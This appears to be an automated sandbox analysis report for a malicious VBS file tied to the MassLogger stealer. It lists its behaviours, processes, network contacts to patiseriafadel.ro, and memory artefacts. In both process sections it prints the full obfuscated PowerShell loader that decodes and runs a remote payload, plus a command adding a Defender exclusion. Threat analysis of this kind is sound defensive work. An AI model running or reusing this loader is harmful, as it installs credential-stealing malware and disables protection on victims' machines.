Analysis Overview
SHA256
4c02a2fad0d163c4e3ab8540c7d2bf8c9266424a4cbec17108f0105fc96cd26a
Threat Level: Known bad
The file Document_BT24PDF.vbs was found to be: Known bad.
Malicious Activity Summary
MassLogger
MassLogger Main Payload
Blocklisted process makes network request
Looks up external IP address via web service
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2020-12-13 23:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2020-12-13 23:09
Reported
2020-12-13 23:11
Platform
win7v20201028
Max time kernel
37s
Max time network
142s
Command Line
Signatures
MassLogger
MassLogger Main Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1852 wrote to memory of 1208 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1852 wrote to memory of 1208 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1852 wrote to memory of 1208 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document_BT24PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ILCQg='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%93%65%F2%F6%27%E2%C6%56%46%16%66%16%96%27%56%37%96%47%16%07%F2%F2%A3%37%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$ILCQg.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | patiseriafadel.ro | udp |
| N/A | 95.214.135.27:443 | patiseriafadel.ro | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 23.21.42.25:80 | api.ipify.org | tcp |
Files
memory/1208-2-0x0000000000000000-mapping.dmp
memory/1852-3-0x0000000002570000-0x0000000002574000-memory.dmp
memory/1208-4-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp
memory/1208-5-0x0000000002480000-0x0000000002481000-memory.dmp
memory/1208-6-0x000000001ABA0000-0x000000001ABA1000-memory.dmp
memory/1208-7-0x00000000024C0000-0x00000000024C1000-memory.dmp
memory/1208-8-0x00000000023E0000-0x00000000023E1000-memory.dmp
memory/1208-9-0x000000001C120000-0x000000001C121000-memory.dmp
memory/1208-10-0x000000001AA90000-0x000000001AA91000-memory.dmp
memory/1208-11-0x000000001B6B0000-0x000000001B6C7000-memory.dmp
memory/1208-12-0x0000000002390000-0x0000000002397000-memory.dmp
memory/1208-13-0x0000000002370000-0x000000000237D000-memory.dmp
memory/784-15-0x00000000004819EE-mapping.dmp
memory/784-14-0x0000000000400000-0x0000000000486000-memory.dmp
memory/784-16-0x0000000000400000-0x0000000000486000-memory.dmp
memory/784-17-0x0000000000400000-0x0000000000486000-memory.dmp
memory/784-18-0x0000000073510000-0x0000000073BFE000-memory.dmp
memory/1068-21-0x0000000000000000-mapping.dmp
memory/1068-23-0x0000000000D10000-0x0000000000D11000-memory.dmp
memory/1068-22-0x0000000073510000-0x0000000073BFE000-memory.dmp
memory/1068-24-0x0000000004AB0000-0x0000000004AB1000-memory.dmp
memory/1068-25-0x0000000001290000-0x0000000001291000-memory.dmp
memory/1068-26-0x0000000004950000-0x0000000004951000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 496860d2ea0838a75eb39e21a3e27af1 |
| SHA1 | fe2bd7439889fb4502403f6c6ac3fa512db78a18 |
| SHA256 | e020187f6f137b2d886851835a257b04eb36746c007ede4d1e0f1458c21aeebc |
| SHA512 | e12f33f8f5d5f7ce9e8d0c38a92a3602a4530c52ce5fa1fefb7b7c959dd411acdb0c16e33307a20cb3449ee7f496aefe03d97f06b0a053d6fb9c4554cdb5c04b |
memory/1068-30-0x0000000005FC0000-0x0000000005FC1000-memory.dmp
memory/1068-35-0x0000000006030000-0x0000000006031000-memory.dmp
memory/1068-36-0x0000000006100000-0x0000000006101000-memory.dmp
memory/1068-43-0x0000000006280000-0x0000000006281000-memory.dmp
memory/1068-44-0x0000000005F80000-0x0000000005F81000-memory.dmp
memory/1068-59-0x0000000006310000-0x0000000006311000-memory.dmp
memory/1068-58-0x0000000006300000-0x0000000006301000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2020-12-13 23:09
Reported
2020-12-13 23:11
Platform
win10v20201028
Max time kernel
14s
Max time network
138s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1400 wrote to memory of 3340 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1400 wrote to memory of 3340 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document_BT24PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ILCQg='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%93%65%F2%F6%27%E2%C6%56%46%16%66%16%96%27%56%37%96%47%16%07%F2%F2%A3%37%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$ILCQg.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | patiseriafadel.ro | udp |
| N/A | 95.214.135.27:443 | patiseriafadel.ro | tcp |
Files
memory/3340-2-0x0000000000000000-mapping.dmp
memory/3340-3-0x00007FFB59970000-0x00007FFB5A35C000-memory.dmp
memory/3340-4-0x000002B46A670000-0x000002B46A671000-memory.dmp
memory/3340-5-0x000002B46A820000-0x000002B46A821000-memory.dmp